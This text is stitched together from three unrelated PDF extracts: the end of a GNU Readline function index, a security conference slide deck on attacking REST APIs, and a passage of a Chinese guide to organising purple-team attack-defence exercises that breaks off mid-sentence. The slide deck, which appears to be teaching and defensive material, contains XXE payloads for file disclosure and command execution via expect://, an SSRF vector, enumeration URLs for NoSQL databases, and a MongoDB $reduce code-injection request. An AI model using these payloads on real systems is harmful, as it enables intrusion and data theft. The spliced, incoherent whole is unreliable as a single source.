rl_possible_completions. . . . . . . . . . . . . . . . . . . . . 42
rl_pre_input_hook. . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_prefer_env_winsize . . . . . . . . . . . . . . . . . . . . . . . 24
rl_prep_term_function . . . . . . . . . . . . . . . . . . . . . . . 25
rl_prep_terminal. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_push_macro_input . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_read_init_file. . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_read_key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_readline_name. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_readline_state. . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
rl_readline_version . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_redisplay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_redisplay_function . . . . . . . . . . . . . . . . . . . . . . . 25
rl_replace_line . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_reset_after_signal . . . . . . . . . . . . . . . . . . . . . . . 40
rl_reset_line_state . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_reset_screen_size . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_reset_terminal. . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_resize_terminal . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_restore_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_restore_state. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_save_prompt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_save_state . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_set_key. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_set_keyboard_input_timeout. . . . . . . . . . . . . . 34
rl_set_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_set_paren_blink_timeout . . . . . . . . . . . . . . . . . 37
rl_set_prompt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_set_screen_size . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_set_signals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
rl_show_char . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_sort_completion_matches . . . . . . . . . . . . . . . . . 47
rl_special_prefixes . . . . . . . . . . . . . . . . . . . . . . . . . 45
rl_startup_hook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_stuff_char . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_terminal_name. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_tty_set_default_bindings . . . . . . . . . . . . . . . . 35
rl_tty_unset_default_bindings. . . . . . . . . . . . . . 35
rl_unbind_command_in_map . . . . . . . . . . . . . . . . . . . 29
rl_unbind_function_in_map . . . . . . . . . . . . . . . . . . 29
rl_unbind_key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_unbind_key_in_map . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_username_completion_function . . . . . . . . . . . 43
rl_variable_bind. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
rl_variable_dumper . . . . . . . . . . . . . . . . . . . . . . . . . . 37
rl_variable_value. . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
S
self-insert (a, b, A, 1, !, ...). . . . . . . . . . . . . 15
set-mark (C-@) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
show-all-if-ambiguous . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
show-all-if-unmodified . . . . . . . . . . . . . . . . . . . . . . . . . . 7
skip-completed-text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
skip-csi-sequence () . . . . . . . . . . . . . . . . . . . . . . . . 19
start-kbd-macro (C-x () . . . . . . . . . . . . . . . . . . . . . 18
T
tab-insert (M-TAB). . . . . . . . . . . . . . . . . . . . . . . . . . . 15
tilde-expand (M-~). . . . . . . . . . . . . . . . . . . . . . . . . . . 18
transpose-chars (C-t) . . . . . . . . . . . . . . . . . . . . . . . 15
transpose-words (M-t) . . . . . . . . . . . . . . . . . . . . . . . 15
U
undo (C-_ or C-x C-u). . . . . . . . . . . . . . . . . . . . . . . . . 18
universal-argument () . . . . . . . . . . . . . . . . . . . . . . . 17
unix-filename-rubout () . . . . . . . . . . . . . . . . . . . . . 16
unix-line-discard (C-u) . . . . . . . . . . . . . . . . . . . . . 16
unix-word-rubout (C-w) . . . . . . . . . . . . . . . . . . . . . . 16
upcase-word (M-u) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Function and Variable Index
68
V
vi-editing-mode (M-C-j) . . . . . . . . . . . . . . . . . . . . . 19
visible-stats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Y
yank (C-y) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
yank-last-arg (M-. or M-_) . . . . . . . . . . . . . . . . . . 14
yank-nth-arg (M-C-y) . . . . . . . . . . . . . . . . . . . . . . . . 14
yank-pop (M-y) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 | pdf |
RESTing On Your Laurels Will Get
You Pwned
By Abraham Kang, Dinis Cruz, and
Alvaro Muñoz
Goals and Main Point
• Originally a 2 hour presentation so we will only be
focusing on identifying remote code execution and
data exfiltration vulnerabilities through REST APIs.
• Remember that a REST API is nothing more than a web
application which follows a structured set of rules.
– So all of the previous application vulnerabilities still apply:
SQL Injection, XSS, Direct Object Reference, Command
Injection, etc.
• If you have both publically exposed and internal REST
APIs then you probably have some remote code
execution and data exfiltration issues.
Causes of REST Vulnerabilities
• Location in the trusted network of your data center
• History of REST Implementations
• Self describing nature
• Input types and interfaces
• URLs to backend REST APIs are built with
concatenation instead of URIBuilder (Prepared URI)
• Inbred Architecture
• Extensions in REST frameworks that enhance
development of REST functionality
• Reliance on incorrectly implemented protocols
(SAML, XML Signature, XML Encryption, etc.)
• Incorrect assumptions of application behavior
Application Architecture Background
FW
Internet
BH2
FW
AS2
SAP
FW
Internet
BH5
FW
AS5
…
FW
Internet
BH4
FW
AS4
ERP
FW
BH1
FW
AS1
Oracle
FW
Internet
BH3
FW
AS3
MS
SQL
Internet
Mongo
Couch
Neo4j
Cassan
LDAP/
AD
HBase
EAI
EII
ESB
Http Protocol (proprietary protocols are different colors)
…
Internal Network of a Data Center
What are the
characteristics of an
Internal Network
(BlueNet,
GreenNet, Trusted
Network)?
AS2
SAP
AS5
…
AS4
ERP
AS1
Oracle
AS3
MS
SQL
Mongo
Couch
Neo4j
Cassan
LDAP/
AD
HBase
EAI
EII
ESB
…
Internal Network of a Data Center
What are the
characteristics of an
Internal Network (BlueNet,
GreenNet, Trusted
Network)?
• Connectivity Freedom
(within the trusted
network)
• Increased Physical Safe
guards
• Hardened Systems at
the OS level
• Shared Services and
Infrastructure
AS2
SAP
AS5
…
AS4
ERP
AS1
Oracle
AS3
MS
SQL
Mongo
Couch
Neo4j
Cassan
LDAP/
AD
HBase
EAI
EII
ESB
…
REST History
• Introduced to the world in a PHD dissertation
by Roy Fielding in 2000.
• Promoted the idea of using HTTP methods
(PUT, POST, GET, DELETE) and the URL itself to
communicate additional metadata as to the
nature of an HTTP request.
– PUT = Update
– POST = Insert
– GET = Select
– DELETE = Delete
• Allowed the mapping of DB interactions on top of self
descriptive URLs
REST History (con’t)
• When REST originally came out, it was harshly
criticized by the security community as being
inherently unsafe.
– As a result REST, applications were originally
developed to only run on internal networks (non-
public access).
• This allowed developers to develop REST APIs in a kind
of “Garden of Eden”
– This also encouraged REST to become a popular
interface for internal backend systems.
– Once developers got comfortable with REST
internal applications they are now RESTifying all
publically exposed application interfaces
Attacking Backend Systems (Old School)
FW
Internet
BH2
FW
AS2
SAP
FW
Internet
BH5
FW
AS5
…
FW
Internet
BH4
FW
AS4
ERP
FW
BH1
FW
AS1
Oracle
FW
Internet
BH3
FW
AS3
MS
SQL
Attacker
Mongo
Couch
Neo4j
Cassan
LDAP/
AD
HBase
EAI
EII
ESB
Http Protocol (proprietary protocols are different colors)
…
Attacking An Internal Network (Old School)
•
Pwn the application server
•
Figure out which systems are
running on the internal
network and target a data rich
server. (Port Scanning and
Fingerprinting)
•
Install client protocol binaries
to targeted system (in this
case SAP client code) so you
can connect to the system.
•
Figure out the correct
parameters to pass to the
backend system by sniffing
the network, reusing
credentials, using default
userids and passwords,
bypassing authentication, etc.
AS2
SAP
AS5
…
AS4
ERP
AS1
Oracle
AS3
MS
SQL
Mongo
Couch
Neo4j
Cassan
LDAP/
AD
HBase
EAI
EII
ESB
…
X
Non-compromised machine
Y
Compromised/Pwned machine
Attacking An Internal Network (REST style)
•
Find an HTTP proxy in the publically
exposed Application/REST API or get
access to curl on a compromised
system in the internal network
•
Figure out which systems are
running on the internal network and
target a data rich server. (Port
Scanning and Fingerprinting is easier
because the REST protocol is self
describing)
•
Exfiltrate data from the REST
interface of the backend system and
pass the correct parameters by
sniffing the network, reusing
credentials, using default userids
and passwords, bypassing
authentication, reading server logs
to find apiKeys, etc.
SAP REST API
SAP
AS5
…
Pub REST API
Oracle
Mongo
Couch
Neo4j
Cassan
HBase
…
X
Non-compromised machine
Y
Affected machine
REST
API
REST
API
REST
API
REST
API
REST
API
REST
API
REST is Self Describing
• What URL would you first try when gathering
information about a REST API and the system
that backs it?
REST is Self Describing
• What URL would you first try when gathering
information about a REST API and the system that
backs it?
– http://host:port/
• Compare this to:
– Select * from all_tables (in Oracle)
– sp_msforeachdb 'select "?" AS db, * from [?].sys.tables'
(SQL Server)
– SELECT DISTINCT TABLE_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE
COLUMN_NAME IN ('columnA','ColumnB') AND
TABLE_SCHEMA='YourDatabase'; (My SQL)
– Etc.
Especially for NoSQL REST APIs
• All of the following DBs have REST APIs which
closely follow their database object structures
– HBase
– Couch DB
– Mongo DB
– Cassandra.io
– Neo4j
HBase REST API
• Find the running HBase version:
– http://host:port/version
• Find the nodes in the HBase Cluster:
– http://host:port/status/cluster
• Find all the tables in the Hbase Cluster:
– http://host:port/
Returns: customer and profile
• Find a description of a particular table’s
schema(pick one from the prior link):
– http://host:port/profile/schema
Couch DB REST API
• Find all databases in the Couch DB:
– http://host:port/_all_dbs
• Find all the documents in the Couch DB:
– http://host:port/{db_name}/_all_docs
Neo4j REST API
• Find version and extension information in the
Neo4j DB:
– http://host:7474/db/data/
Mongo DB REST API
• Find all databases in the Mongo DB:
– http://host:port/
– http://host:port/api/1/databases
• Find all the collections under a named
database ({db_name}) in the Mongo DB:
– http://host:port/api/1/database/{db_name}/colle
ctions
Cassandra.io REST API
• Find all keyspaces in the Cassandra.io DB:
– http://host:port/1/keyspaces
• Find all the column families in the
Cassandra.io DB:
– http://host:port/1/columnfamily/{keyspace_name
}
REST Input Types and Interfaces
• Does anyone know what the main input types
are to REST interfaces?
REST Input Types and Interfaces
• Does anyone know what the main input types
are to REST interfaces?
– XML and JSON
XML Related Vulnerabilities
• When you think of XML--what vulnerabilities
come to mind?
XML Related Vulnerabilities
• When you think of XML--what vulnerabilities
come to mind?
– XXE (eXternal XML Entity Injection) / SSRF (Server
Side Request Forgery)
– XSLT Injection
– XDOS
– XML Injection
– XML Serialization
XXE (File Disclosure and Port Scanning)
• Most REST interfaces take raw XML to de-serialize into
method parameters of request handling classes.
• XXE Example when the name element is echoed back in
the HTTP response to the posted XML which is parsed
whole by the REST API:
<?xml encoding=“utf-8” ?>
<!DOCTYPE Customer [<!ENTITY y SYSTEM ‘../WEB-
INF/web.xml’> ]>
<Customer>
<name>&y;</name>
</Customer>
*See Attacking <?xml?> processing by Nicolas Gregoire
(Agarri)
XXE Demo
XXE (Remote Code Execution)
• Most REST interfaces take raw XML to de-serialize into
method parameters of request handling classes.
• XXE Example when the name element is echoed back in
the HTTP response to the posted XML which is parsed
whole by the REST API:
<?xml encoding=“utf-8” ?>
<!DOCTYPE Customer [<!ENTITY y SYSTEM ‘expect://ls’> ]>
<Customer>
<name>&y;</name>
</Customer>
*See XXE: advanced exploitation, d0znpp, ONSEC
How does the expect:// protocol work???
SSRF
• Anything which looks like a URI/URL in XML is a
candidate for internal network port scanning or data
exfiltration.
• WS-Addressing example:
<To xmlns=http://www.w3.org/2005/08/addressing>
http://MongoServer:8000</To>
*See: SSRF vs. Business-critical Applications Part 2:
New Vectors and Connect-Back Attacks by Alexander
Polyakov
XML Serialization Vulns
• Every REST API allows the raw input of XML to be
converted to native objects. This deserialization
process can be used to execute arbitrary code on
the REST server.
– REST APIs which use XStream and XMLDecoder
where found to have these vulnerabilities
• When xml is directly deserialized to ORM objects
and persisted, an attacker could supply fields
which are externally hidden but present in the
database (i.e. role(s)) This usually occurs in the
user or profile updating logic of a REST API.
XML Serialization Remote Code
Execution – XStream (Demo)
• Alvaro Munoz figured this out
XML Serialization Remote Code
Execution – XMLDecoder(Demo)
XML Serialization Mass Assignment
(Demo)
URLs to backend REST APIs are built
with concatenation instead of
URIBuilder (Prepared URI)
• Most publically exposed REST APIs turn around
and invoke internal REST APIs using
URLConnections, Apache HttpClient or other
REST clients. If user input is directly
concatenated into the URL used to make the
backend REST request then the application could
be vulnerable to Extended HPPP.
Extended HPPP (HTTP Path & Parameter Pollution)
•
HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and
Luca Carettoni in 2009. It utilized the discrepancy in how duplicate
request parameters were processed to override application specific
default values in URLs. Typically attacks utilized the “&” character to
fool backend services in accepting attacker controlled request
parameters.
•
Extended HPPP utilizes matrix and path parameters as well as path
segment characters to change the underlying semantics of a REST URL
request.
– “#” can be used to remove ending URL characters similar to “--” in SQL
Injection and “//” in JavaScript Injection
– “../” can be used to change the overall semantics of the REST request in
path based APIs (vs query parameter based)
– “;” can be used to add matrix parameters to the URL at different path
segments
– The “_method” query parameter can be used to change a GET request to a
PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)
– Special framework specific query parameters allow enhanced access to
backend data through REST API. The “qt” parameter in Apache Solr
Extended HPPP (Demo)
Inbred Architecture
• Externally exposed
REST APIs typically use
the same
communication
protocol (HTTP) and
REST frameworks that
are used in internal
only REST APIs.
• Any vulnerabilities
which are present in
the public REST API
can be used against
the internal REST APIs.
SAP REST API
SAP
AS5
…
Pub REST API
Oracle
Mongo
Couch
Neo4j
Cassan
HBase
…
REST
API
REST
API
REST
API
REST
API
REST
API
REST
API
Extensions in REST frameworks that enhance
development of REST functionality
• Turns remote code execution from a security
vulnerability into a feature.
– In some cases it is subtle:
• Passing in partial script blocks used in evaluating the
processing of nodes.
• Passing in JavaScript functions which are used in map-
reduce processes.
– In others it is more obvious:
• Passing in a complete Groovy script which is executed as a
part of the request on the server. Gremlin Plug-in for
Neo4j.
Rest Extensions Remote Code
Execution(Demo)
Reliance on incorrectly implemented
protocols (SAML, XML Signature, XML
Encryption, etc.)
• SAML, XML Signature, XML Encryption can be subverted
using wrapping based attacks.*
See: How to Break XML Encryption by Tibor Jager and Juraj
Somorovsky, On Breaking SAML: Be Whoever You Want to Be
by Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco
Kampmann, and Meiko Jensen, and How To Break XML
Signature and XML Encryption by Juraj Somorovsky (OWASP
Presentation)
Incorrect assumptions of REST
application behavior
• Guidance related to REST implementation of
security take adhering to REST principles over
security
• REST provides for dynamic URLs and dynamic
resource allocation
Incorrect assumptions of REST
application behavior (Example 1)
• According to many REST authentication guides
on the Internet, an “apiKey” passed as a GET
parameter is the best way to keep track of
authenticated users with stateless sessions.
Incorrect assumptions of application
REST behavior (Example 1)
• According to many REST authentication guides
on the Internet, an “apiKey” passed as a GET
parameter is the best way to keep track of
authenticated users with stateless sessions.
• But HTTP GET Parameters are usually exposed in
proxy logs, browser histories, and HTTP server
logs.
REST provides for dynamic URLs and
dynamic resource allocation
Example Case Study
• You have an Mongo DB REST API which exposes two
databases which can only be accessed at /realtime/*
and /predictive/*
• There are two ACLs which protect all access to each
of these databases
<web-resource-name>Realtime User</web-resource-name> <url-
pattern>/realtime/*</url-pattern>
<web-resource-name>Predictive Analysis User</web-resource-name>
<url-pattern>/predicitive/*</url-pattern>
Can anyone see the problem? You should be able to
own the server with as little disruption to the existing
databases.
Example Case Study Exploit
• The problem is not in the two databases. The
problem is that you are working with a REST API
and resources are dynamic.
• So POST to the following url to create a new
database called test which is accessible at
“/test”:
POST http://svr.com:27080/test
• The POST the following:
POST http://svr.com:27080/test/_cmd
– With the following body:
cmd={…, “$reduce”:”function (obj, prev) {
malicious_code() }” …
REST Attacking Summary
• Attack serialization in the exposed XML/JSON
interfaces to execute remote code
• Attack the proxied requests to backend systems
using Extended HPPP
• Use XXE/SSRF to read local config files, execute
arbitrary code, or port scan and attack other
internal REST exposed applications
• Look for other internal REST APIs through
HATEOAS links in XML responses
• By-pass authentication
Questions
? | pdf |
实战攻防演习之
紫队视角下的实战攻防演习组织
1
实战攻防演习之
紫队视角下的实战攻防演习组织
3
前 言
网络实战攻防演习,是新形势下关键信息系统网络
安全保护工作的重要组成部分。演习通常是以实际运
行的信息系统为保护目标,通过有监督的攻防对抗,
最大限度地模拟真实的网络攻击,以此来检验信息系
统的实际安全性和运维保障的实际有效性。
2016年以来,在国家监管机构的有力推动下,网
络实战攻防演习日益得到重视,演习范围越来越广,
演习周期越来越长,演习规模越来越大。国家有关部
门组织的全国性网络实战攻防演习从2016年仅有几家
参演单位,到2019年已扩展到上百家参演单位;同时
各省、各市、各行业的监管机构,也都在积极地筹备
和组织各自管辖范围内的实战演习。一时间,网络实
战攻防演习遍地开花。
在演习规模不断扩大的同时,攻防双方的技术水平
和对抗能力也在博弈中不断升级。
2016年,网络实战攻防演习尚处于起步阶段,攻
防重点大多集中于互联网入口或内网边界。
2017年,实战攻防演习开始与重大活动的网络安
全保障工作紧密结合。就演习成果来看,从互联网侧
实战攻防演习之
紫队视角下的实战攻防演习组织
4
发起的直接攻击仍然普遍十分有效;而系统的外层防
护一旦被突破,横向移动、跨域攻击,往往都比较容
易实现。
2018年,网络实战攻防演习开始向行业和地方深
入。伴随着演习经验的不断丰富和大数据安全技术的
广泛应用,防守方对攻击行为的监测、发现和溯源能
力大幅增强,与之相应的,攻击队开始更多地转向精
准攻击和供应链攻击等新型作战策略。
2019年以来.网络实战攻防演习工作受到了监
管部门、政企机构和安全企业的空前重视。流量分
析、EDR、蜜罐、白名单等专业监测与防护技术被防
守队广泛采用。攻击难度的加大也迫使攻击队全面升
级,诸如0day漏洞攻击、1day漏洞攻击、身份仿冒、
钓鱼WiFi、鱼叉邮件、水坑攻击等高级攻击手法,在
实战攻防演练中均已不再罕见,攻防演习与网络实战
的水平更加接近。
如何更好地参与网络实战攻防演习?如何更好地借
助实战攻防演习提升自身的安全能力?这已经成为大
型政企机构运营者关心的重要问题。
作为国内领先的网络安全企业,奇安信集团已成为
全国各类网络实战攻防演习的主力军。奇安信集团安
实战攻防演习之
紫队视角下的实战攻防演习组织
5
服团队结合200余次实战攻防演习经验,总结编撰了这
套实战攻防演习系列丛书,分别从红队视角、蓝队视
角和紫队视角,来解读网络实战攻防演习的要领,以
及如何结合演习提升政企机构的安全能力。
需要说明的是,实战攻防演习中的红方与蓝方对抗
实际上是沿用了军事演习的概念和方法,一般来说,
红方与蓝方分别代表攻击方与防守方。不过,红方和
蓝方的名词定义尚无严格的规定,也有一些实际的攻
防演习,将蓝队设为攻击队、将红队设为防守队。在
本系列丛书中,我们依据绝大多数网络安全工作者的
习惯,统一将攻击队命名为红队,将防守队命名为蓝
队,而紫队则代表组织演练的机构。
《紫队视角下的实战攻防演习组织》是本系列丛书
的第三本。本书重点介绍实战环境下的紫队工作,提
出组织实战攻防演习的四个阶段,给出实战攻防演习
的组织要素、组织形式,明确演习各方的人员职责,
描述每阶段需开展的重点工作,并提示在开展实战攻
防演习时应规避的风险。
实战攻防演习之
紫队视角下的实战攻防演习组织
6
目 录
第一章 什么是紫队......................................1
一、实战攻防演习组织要素...................................1
二、实战攻防演习组织形式...................................3
三、实战攻防演习组织关键...................................3
第二章 实战攻防演习组织的四个阶段..............6
一、组织策划阶段..................................................6
二、前期准备阶段................................................15
三、实战攻防演习阶段.........................................17
四、演习总结阶段................................................20
第三章 实战攻防演习风险规避措施...............24
一、演习限定攻击目标系统,不限定攻击路径...24
二、除授权外,演习不允许使用拒绝服务攻击...24
实战攻防演习之
紫队视角下的实战攻防演习组织
7
三、网页篡改攻击方式的说明.............................24
四、演习禁止采用的攻击方式.............................25
五、攻击方木马使用要求.....................................25
六、非法攻击阻断及通报.....................................26
附录 奇安信实战攻防演习组织经验...............27
实战攻防演习之
紫队视角下的实战攻防演习组织
1
第一章 什么是紫队
紫队,一般是指网络实战攻防演习中的组织方。
紫队是在实战攻防演习中,以组织方角色,开展演
习的整体组织协调工作,负责演习组织、过程监控、
技术指导、应急保障、演习总结、技术措施与策略优
化建议等各类工作。
紫队组织红队对实际环境实施攻击,组织蓝队实施
防守,目的是通过演习检验参演单位安全威胁应对能
力、攻击事件检测发现能力、事件分析研判能力和事
件响应处置能力,提升被检测机构安全实战能力。
下面,就针对紫队组织网络实战攻防演习的要素、
形式和关键点分别进行介绍。
一、实战攻防演习组织要素
组织一次网络实战攻防演习,组织要素包括:组织
单位、演习技术支撑单位、攻击队伍(即红队)、防
守单位这四个部分。
实战攻防演习之
紫队视角下的实战攻防演习组织
2
组织单位负责总体把控、资源协调、演习准备、演
习组织、演习总结、落实整改等相关工作等。
演习技术支撑单位由专业安全公司提供对应技术支
撑和保障,实现攻防对抗演习环境搭建和攻防演习可
视化展示。
攻击队伍,也即红队,一般由多家安全厂商独立
组队,每支攻击队一般配备3-5人。在获得授权前提
下,以资产探查、工具扫描和人工渗透为主进行渗透
攻击,以获取演习目标系统权限和数据。
防守队伍,也即蓝队,由参演单位、安全厂商等人
员组成,主要负责对防守方所管辖的资产进行防护,
可视化展示,所有攻击行
为安全可控,
组织单位
攻防演习平台
攻击队伍
防守单位
总体把控、资源协调、专家评审、
裁判打分
成立若干攻击小组,以竞赛或合
作的方式展开真实的网络攻击,
发现安全漏洞,获得服务器权限
可视化展示
所有攻击行为安全可控
攻击录屏,视频监控
成立防守小组,实时监控网络,
进行实时阻断、应急响应等工作
实战攻防演习之
紫队视角下的实战攻防演习组织
3
在演习过程中尽可能不被红队拿到权限和数据。
二、实战攻防演习组织形式
网络实战攻防演习的组织形式根据实际需要出发,
主要有以下两种:
1)由国家、行业主管部门、监管机构组织的演习
此类演习一般由各级公安机关、各级网信部门、
政府、金融、交通、卫生、教育、电力、运营商等国
家、行业主管部门或监管机构组织开展。针对行业关
键信息基础设施和重要系统,组织攻击队以及行业内
各企事业单位进行网络实战攻防演习。
2)大型企事业单位自行组织演习
央企、银行、金融企业、运营商、行政机构、事业
单位及其他政企单位,针对业务安全防御体系建设有
效性的验证需求,组织攻击队以及企事业单位进行实
战攻防演习。
三、实战攻防演习组织关键
实战攻防演习得以成功实施,组织工作包括:演
习范围、周期、场地、设备、攻防队伍组建、规则制
实战攻防演习之
紫队视角下的实战攻防演习组织
4
定、视频录制等多个方面。
演习范围:优先选择重点(非涉密)关键业务系统
及网络。
演习周期:结合实际业务开展,一般建议1-2周。
演习场地:依据演习规模选择相应的场地,可以容
纳指挥部、攻击方、防守方,三方场地分开。
演习设备:搭建攻防演习平台、视频监控系统,为
攻击方人员配发专用电脑等。
攻击方组建:选择参演单位自有人员或聘请第三方
安全服务商专业人员组建。
防守队组建:以各参演单位自有安全技术人员为
主,聘请第三方安全服务商专业人员为辅构建防守队
伍。
演习规则制定:演习前明确制定攻击规则、防守规
则和评分规则,保障攻防过程有理有据,避免攻击过
程对业务运行造成不必要的影响。
演习视频录制:录制演习的全过程视频,作为演习
汇报材料以及网络安全教育素材,内容包括:演习工
实战攻防演习之
紫队视角下的实战攻防演习组织
5
作准备、攻击队攻击过程、防守队防守过程以及裁判
组评分过程等内容。
实战攻防演习之
紫队视角下的实战攻防演习组织
6
第二章 实战攻防演习组织的四个阶段
实战攻防演习的组织可分为四个阶段:
组织策划阶段:此阶段明确演习最终实现的目标,
组织策划演习各项工作,形成可落地、可实施的实战
攻防演习方案,并需得到领导层认可。
前期准备阶段:在已确定实施方案基础上开展资源
和人员的准备,落实人财物。
实战攻防演习阶段:是整个演习的核心,由组织方
协调攻防两方及其他参演单位完成演习工作,包括演
习启动、演习过程、演习保障等。
演习总结阶段:先恢复所有业务系统至日常运行状
态,再进行工作成果汇总,为后期整改建设提供依据。
下面依次进行详细介绍。
一、组织策划阶段
网络实战攻防演习是否成功,组织策划环节非常关
键。组织策划阶段主要从建立演习组织、确定演习目
标、制定演习规则、确定演习流程、搭建演习平台、
实战攻防演习之
紫队视角下的实战攻防演习组织
7
应急保障措施这六个方面进行合理规划、精心编排,
这样才能指导后续演习工作开展。
(一)建立演习组织
为确保攻防演习工作顺利进行,成立实战攻防演习
工作组及各参演小组,组织架构通常如下:
演习组织机构设置示意图
1)攻击组(红队)
由参演单位及安全厂商攻击人员构成,一般由攻防
渗透人员、代码审计人员、内网攻防渗透人员等技术
人员组成。负责对演习目标实施攻击。
实战攻防演习之
紫队视角下的实战攻防演习组织
8
2)防守组
由各个防护单位运维技术人员和安全运营人员组
成,负责监测演习目标,发现攻击行为,遏制攻击行
为,进行响应处置。
3)技术支撑组
其职责是攻防过程整体监控,主要工作为攻防过
程中实时状态监控、阻断处置操作等,保障攻防演习
过程安全、有序开展。演习组织方,即紫队需要负责
演习环境运维,维护演习IT环境和演习监控平台正常运
行。
4)监督评价组
由攻防演习主导单位组织形成专家组和裁判组,负
责攻防演习过程中巡查各个攻击小组,即红队的攻击
状态,监督攻击行为是否符合演习规则,并对攻击效
果进行评价。专家组负责对演习整体方案进行研究,
在演习过程中对攻击效果进行总体把控,对攻击成果
进行研判,保障演习安全可控。裁判组负责在演习过
程中对攻击状态和防守状态进行巡查,对攻击方操作
进行把控,对攻击成果判定相应分数,依据公平、公
正原则对参演攻击队和防守单位给予排名。
实战攻防演习之
紫队视角下的实战攻防演习组织
9
5)组织保障组
由演习组织方指定工作人员组成,负责演习过程中
协调联络和后勤保障等相关事宜,包括演习过程中应
急响应保障、演习场地保障、演习过程中视频采集等
工作。
(二)确定演习目标
依据实战攻防演习需要达到的演习效果,对参演单
位业务和信息系统全面梳理,可以由演习组织方选定
或由参演单位上报,最终选取确认演习目标系统。通
常会选择关键信息基础设施、重要业务系统、门户网
站等作为演习首选目标。
(三)制定演习规则
依据演习目标结合实际演习场景,细化攻击规则、
防守规则和评分规则。为了鼓励和提升防守单位防守
技术能力,可以适当增加防守方反击得分规则。
演习时间:通常为工作日5×8小时,组织单位视情
况还可以安排为7×24小时。
沟通方式:即时通信软件、邮件、电话等。
实战攻防演习之
紫队视角下的实战攻防演习组织
10
(四)确定演习流程
实战攻防演习正式开始后的流程一般如图所示:
1)确认人员就位
确认红队人员以及攻防演习组织方、防守组人员按
要求到位。
2)确认演习环境
攻击组与技术支撑组确认演习现场和演习平台准备
实战攻防演习之
紫队视角下的实战攻防演习组织
11
就绪。
3)确认准备工作
防守组确认参演系统备份情况,目标系统是否正
常,并已做好相关备份工作。
4)演习开始
各方确认准备完毕,演习正式开始。
5)攻击组实施攻击
红队对目标系统开展网络攻击,记录攻击过程和成
果证据。
6)防守组监测攻击
防守组可利用安全设备对网络攻击进行监测,对发
现的攻击行为进行分析确认,详细记录监测数据。
7)提交成果
演习过程中,红队人员发现可利用安全漏洞,将获
取的权限和成果截图保存,通过平台进行提交。
实战攻防演习之
紫队视角下的实战攻防演习组织
12
8)漏洞确认及研判
由专家组对提交的漏洞进行确认,确认漏洞的真实
性,并根据演习计分规则进行分数评判。
9)攻击结束
在演习规定时间外,攻击组人员停止对目标系统的
攻击。
10)成果总结
演习工作组协调各参演小组,对演习中产生的成
果、问题、数据进行汇总,输出相关演习总结报告。
11)资源回收
由演习工作组负责对各类设备、网络资源进行回
收,同时对相关演习数据进行回收处理,并监督攻击
组人员对在演习过程中使用的木马、脚本等数据进行
清除。
12)演习结束
对所有目标系统攻击结束后,工作小组还需要进行
内部总结汇报,演习结束。
实战攻防演习之
紫队视角下的实战攻防演习组织
13
(五)搭建演习平台
为了保证演习过程安全可靠,需搭建攻防演习平
台,演习平台包括:攻击场地、防守场地、攻击目标
信息系统、指挥大厅、攻击行为分析中心。
1)攻击场地
攻击场地可分为场内攻击和场外攻击,搭建专用的
网络环境并配以充足的攻击资源。正式攻击阶段,攻
击小组在对应场所内实施真实性网络攻击。场地内部
署攻防演习监控系统,协助技术专家监控攻击行为和
流量,以确保演习中攻击的安全可控。
2)防守场地
防守场地主要是防守方演习环境,可通过部署视频
监控系统将防守工作环境视频回传指挥中心。
3)攻击目标信息系统
攻击目标信息系统即防守方网络资产系统。防守方
在被攻击系统开展相应的防御工作。
实战攻防演习之
紫队视角下的实战攻防演习组织
14
4)攻击行为分析中心
攻击行为分析中心通过部署网络安全审计设备对攻
击者攻击行为进行收集及分析,实时监控攻击过程,
由日志分析得出攻击步骤,建立完整的攻击场景,直
观地反应目标主机受攻击的状况,并通过可视化大屏
实时展现。
5)指挥大厅
演习过程中,攻方和守方的实时状态将接入到指挥
大厅监控大屏,领导可以随时进行指导、视察。
(六)应急保障措施
指攻防演习中发生不可控突发事件,导致演习过程
中断、终止时,所需要采取的处置措施预案。需要预
先对可能发生的紧急事件(如断电,断网,业务停顿
等)做出临时处置安排措施。攻防演习中一旦参演系
统出现问题,防守方应采取临时处置安排措施,及时
